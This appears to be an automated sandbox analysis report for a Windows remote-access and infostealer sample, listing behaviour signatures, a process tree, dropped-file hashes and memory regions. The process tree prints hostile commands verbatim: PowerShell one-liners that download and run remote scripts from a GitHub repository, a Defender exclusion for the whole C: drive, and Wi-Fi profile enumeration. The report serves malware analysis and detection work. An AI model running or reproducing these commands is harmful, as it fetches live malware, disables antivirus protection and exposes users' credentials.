Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/08/2024, 05:24

General

  • Target

    2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    ba21fe70f90349c111abf6b43a9b4754

  • SHA1

    a3e53333ac1bee40eb5c8cebbb59e7078238707e

  • SHA256

    d55391034b06b7e03eeb2351b1d249a9ce0f001acacb0666e0cd273c65f54512

  • SHA512

    15317bcb1d3f34d0d3bcc56bf6254fad858b0973a70df06d2b18c56e293f39eaf7bc1f8fde275059f67e6c36f1bb24538078be69b96bdfe07429e85b076027bb

  • SSDEEP

    98304:B4KSqfN+NFwm29yrA7I3TKBaGj1EEqDWRtE7O1OxMZjNT/61Sx2i1HFM+9JHdmLk:xN+NFWDGFCxnm1Sv1HFLrHggImTyk

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3684
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\indxs0nx\indxs0nx.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88B8.tmp" "c:\Users\Admin\AppData\Local\Temp\indxs0nx\CSC459A05D4F24E4F02AE99D7A1C8EF249.TMP"
          4⤵
            PID:1756
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:644
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2620
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:1208
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:2748
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:2504
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:2792
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:3848
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4736
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:1680
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:4604
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:4432
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:660
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:788
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:516
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4284
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4308
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1096
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1984
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A8.tmp" "c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\CSC3ACFDC58817B41E18C71652D5E26F32.TMP"
                          4⤵
                            PID:388
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2624
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:1880
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4180
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4808
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:2860
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:2792
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4284
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x530 0x528
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3432

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          d71c7d15748177ac7bda63669279b7bd

                          SHA1

                          927891cd898e24ccafa1c8dcb79853126953bd3e

                          SHA256

                          0f7d506057ea592aa234bc3e6982d2133e2dd3b67bf75678c8b4132f5b50972d

                          SHA512

                          fb410da790bdc39eb745c3fd35eb4c1ca2202ce88739ac80f3b061a650544991622512658e482eb124fa6c39ff99ccd95cad74e26dd7804c439dc7b9345ea2a1

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          0789009e381ff689e09144d17087b434

                          SHA1

                          43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

                          SHA256

                          120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

                          SHA512

                          4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          b0bb606a759ab49e1662b1c1139953f7

                          SHA1

                          3b0d7a5f6c038e9a53c3616b63160577edfb79de

                          SHA256

                          a7c46158f81a64738a8d6aa9d84e026fd6725c77213e461a89a28d87f12b18b1

                          SHA512

                          804deeb30ed2825585f1280822fb4fbccdca6b12e86b950792154715825bf7d245729777ee9367344a376b652e873d489a224eeff634a88d503939e30b1aa0f1

                        • C:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.dll

                          Filesize

                          4KB

                          MD5

                          d7912aba936bca50092a15562672416b

                          SHA1

                          896538b19a160d9ec79ef9dff006936ab3ae33ce

                          SHA256

                          52377bc8a78c107973c4ed1f700ec7606284ab251ef7e3ac52e17f54691a442d

                          SHA512

                          1ab429f46bcda11984a8a8e4a134bcb19ccb1b30324ad75b5d55f71284a43600cf94ebf86d734ce8d78fd75a295045068f40335633b2e3d666f0db95b89ffc52

                        • C:\Users\Admin\AppData\Local\Temp\RES88A8.tmp

                          Filesize

                          1KB

                          MD5

                          22f898e9e2935ccce7003254eb2ae0d8

                          SHA1

                          ceb08e2e72f0e20d05922a4536b2713506067728

                          SHA256

                          bae5048f6f65fd5c55fa9989937cd28ee0274c1b1619fe3635d2c30f92c96ed1

                          SHA512

                          bd69b686f1b5e0440ff97305b13d8d7126cd21182484d9fb2c85def7078804b0f8a54cc14a58dba6aba42ae017bf427bb79ec76d934068fe3ddec64363819b53

                        • C:\Users\Admin\AppData\Local\Temp\RES88B8.tmp

                          Filesize

                          1KB

                          MD5

                          2d6c89b011d18e7654bc4b6e516b1e0b

                          SHA1

                          ad4585d8b7f767fcf733674fc618574af01b6d08

                          SHA256

                          980905746e4e64e5648330b549514f6ed915b19b345e2241a55b2705223143fc

                          SHA512

                          d737e62fa81b95cb1ef1a4b049916ae4730c396f392b11c1e8e38a5e6a0de974de8a97d2214645102f6c985d5e806b239fd283c661eadc4a26d84c933b793f1f

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          93KB

                          MD5

                          acbdf2e2c6a5c44b3b589a63ae41408b

                          SHA1

                          7643f77f9316814156fd0a49017fef1e5a3b9621

                          SHA256

                          63a96e5a606c9a34a15aadd53ce6d93696f11dec8967a72908aade2c8a8075f0

                          SHA512

                          6edf8ddb2e1da2d75405c009660b83aee50683478f8eca274a84389ae6e3521acbb9694528c287a4474cde6ed46a0050084bbb8071c2d62f4edda5d785b5d9d5

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          23KB

                          MD5

                          aaba23cb561aec7b0ffae4ace0405d2e

                          SHA1

                          ac98764ac99bb5312ac2ac995f3e5cc3c0c05218

                          SHA256

                          4d17e37f74838092e60324bf9803fd12b79e969475c65dd77498e8329ccf0e31

                          SHA512

                          727aec5daeb6d4ac44ed228cd4e68d4530b30d1bf1e76d21a6bb9957caac90129961ca60dbcf00f7fd1a3138182dd0b415558342045c9570519292261386491f

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4l02a0a.0bj.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\indxs0nx\indxs0nx.dll

                          Filesize

                          4KB

                          MD5

                          2c828f041e94b76bc9270c1017bccb00

                          SHA1

                          2c8f499ba080cb0d47a4a20306250107e54fb554

                          SHA256

                          818e18a66ad05a6f5d7fa978ea731ff82da59a03aaab6e784727723d58cd905f

                          SHA512

                          1867d051140baf49904daf727dec289da6ba4aa750b05d7a3fe3b1610eb29c6e90d93d9a142e099d56e68d0db0f40e53dc66052b32eee2f4fe412f1c8cdd1dd7

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.cmdline

                          Filesize

                          369B

                          MD5

                          95f9292434ef9740f8bcfdedc3b24c66

                          SHA1

                          76bf2f62c40ae3388ba171f690bb9366006b921d

                          SHA256

                          a6f73274ce9da7716b28be08ae63c4898b7b9436921bfbd7f380a97491c05d71

                          SHA512

                          26f681ea36d6b4dc2e03aaa98e9a8a69ea06cecb3ac5127d46bcae9bcad8e0159a1b4d537939853da7127841df9f7ce93061cc2ba6fa0a5c59ec4c3e365b8d85

                        • \??\c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\CSC3ACFDC58817B41E18C71652D5E26F32.TMP

                          Filesize

                          652B

                          MD5

                          abc44909765c5a1648c1a27be837fa43

                          SHA1

                          7c7286fa4b072cefb0051ee2481c4ecb17b2f5fe

                          SHA256

                          3a920c68e4fc3df48f8adbadbd587e3d547c7e0e9d64a8c9bc29015af494b91e

                          SHA512

                          006e36c0a4e0623962c75c686d9f29d66b57dbaa72822331d6b63bf06348c2f4c3a5f0bbf67b8bbbdccddfde8eaed5dc49505580ff315153ba2d89e56a4209ce

                        • \??\c:\Users\Admin\AppData\Local\Temp\indxs0nx\CSC459A05D4F24E4F02AE99D7A1C8EF249.TMP

                          Filesize

                          652B

                          MD5

                          49d4957abab4edf792fcb95f02946653

                          SHA1

                          67ae06d7377dad75dd3b611622a893763ff09350

                          SHA256

                          c2992e524702866eb9f6375cfc6fbcc8de5575e6646de5ab42f049f6d5547014

                          SHA512

                          be434458abae039fad8e14a15219c4f7be7cc609ff079ea5b23cf5584d902251fefaa847b0e096efba5cfe1d01a297b0022e7e2e0aee4e6f29885f346aac869d

                        • \??\c:\Users\Admin\AppData\Local\Temp\indxs0nx\indxs0nx.cmdline

                          Filesize

                          369B

                          MD5

                          445440d3531aaae20a2326586112301b

                          SHA1

                          4e76214e3bb283e2142f067387272232f9a4cd06

                          SHA256

                          d96c3790ff40fdc4c8275d84e48d3d4fa13d72eec6bbf67f3c523da2cf9fe3a6

                          SHA512

                          d474d0a58ff061fd0845e8bdcd9482f460df10e653cc88879f6b7853d60fe4790e0d8e8e121303bc20b97e637e0e8e71e01524cfd0fe1efff43d484620e0b7d6

                        • memory/1096-68-0x0000029DD32F0000-0x0000029DD32F8000-memory.dmp

                          Filesize

                          32KB

                        • memory/1096-0-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

                          Filesize

                          2.8MB

                        • memory/1096-88-0x0000029DD2FB0000-0x0000029DD31CC000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/1096-89-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

                          Filesize

                          2.8MB

                        • memory/1096-1-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

                          Filesize

                          2.8MB

                        • memory/2624-77-0x00000200FA440000-0x00000200FA65C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/2624-2-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

                          Filesize

                          2.8MB

                        • memory/2624-78-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

                          Filesize

                          2.8MB

                        • memory/2624-12-0x00000200FA760000-0x00000200FA782000-memory.dmp

                          Filesize

                          136KB

                        • memory/3684-65-0x000001B832950000-0x000001B832958000-memory.dmp

                          Filesize

                          32KB

                        • memory/3684-93-0x000001B8335A0000-0x000001B8335C4000-memory.dmp

                          Filesize

                          144KB

                        • memory/3684-128-0x000001B833450000-0x000001B83345A000-memory.dmp

                          Filesize

                          40KB

                        • memory/3684-127-0x000001B833460000-0x000001B833472000-memory.dmp

                          Filesize

                          72KB

                        • memory/3684-92-0x000001B8335A0000-0x000001B8335CA000-memory.dmp

                          Filesize

                          168KB

                        • memory/3684-137-0x000001B832AD0000-0x000001B832CEC000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/3684-80-0x000001B8339A0000-0x000001B834146000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/4180-103-0x0000015DAD920000-0x0000015DADB3C000-memory.dmp

                          Filesize

                          2.1MB